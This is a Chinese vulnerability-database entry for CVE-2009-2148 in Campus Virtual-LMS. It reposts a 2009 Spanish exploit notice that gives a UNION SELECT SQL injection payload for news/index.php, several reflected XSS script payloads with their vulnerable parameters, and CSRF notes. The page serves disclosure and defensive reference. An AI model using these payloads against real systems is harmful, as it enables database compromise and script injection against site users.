Campus Virtual-LMS SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117948 漏洞类型 SQL注入
发布时间 2009-06-12 更新时间 2009-06-12
CVE编号 CVE-2009-2148 CNNVD-ID CNNVD-200906-344
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/8937
https://www.securityfocus.com/bid/44133
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200906-344
|漏洞详情
CampusVirtual-LMS的news/index.php中存在SQL注入漏洞。远程攻击者可以借助id参数,执行任意SQL指令。
|漏洞EXP
+-----------------------------------------------------------------------------+
LMS:   Campus Virtual-LMS
WEB:   http://campusvirtualcomputrade.cae.net

Autor: Yasión
Fecha: 12 jun 2009
+-----------------------------------------------------------------------------+

 -----------------------------------------------------------------------------+
 [+] SQLi
 -----------------------------------------------------------------------------+
   Archivo: news/index.php [no logged]
   GET: ?id
   Inyección: -1 union select 1,2,3,4,5,6,7
 -----------------------------------------------------------------------------+

 -----------------------------------------------------------------------------+
 [+] XSS
 -----------------------------------------------------------------------------+
   Archivo: enrolments/step1.php [no logged]
   GET: ?courseid
   Inyección: 1"><script>alert(/xD/.source)</script>

   Archivo: files/shared_list.php [logged]
   GET/POST: ?search
   Inyección: "><script>alert(/xD/.source)</script><!--

   Archivo: files/shared_list.php [logged]
   GET: ?siteid
   Inyección: "><script>alert(/xD/.source)</script><!--
 -----------------------------------------------------------------------------+

 -----------------------------------------------------------------------------+
 [+] CSRF
 -----------------------------------------------------------------------------+
   Archivo: login/logout.php
   Info: Desconecta al usuario mediante una imagen, un redireccionamiento, un
   link...

   Archivo: enrolments/step2.php
   GET: ?action=[ACTION]&orderid=[ORDERID]&courseid=[COURSEID]
   Info: Añade o elimina [ADD/DELETE] el curso identificado por COURSEID a la
   cesta identificada por ODERID.    Sería necesario conocer por adelantado la
   cesta del usuario. (No explotable)
 -----------------------------------------------------------------------------+

+-----------------------------------------------------------------------------+
Gretz: UnderSecurity.net
+-----------------------------------------------------------------------------+

# milw0rm.com [2009-06-12]
|受影响的产品
CAMPUS VIRTUAL E-LEARNING Campus Virtual-LMS 0
|参考资料

来源:VUPEN
名称:ADV-2009-1583
链接:http://www.vupen.com/english/advisories/2009/1583
来源:MILW0RM
名称:8937
链接:http://www.milw0rm.com/exploits/8937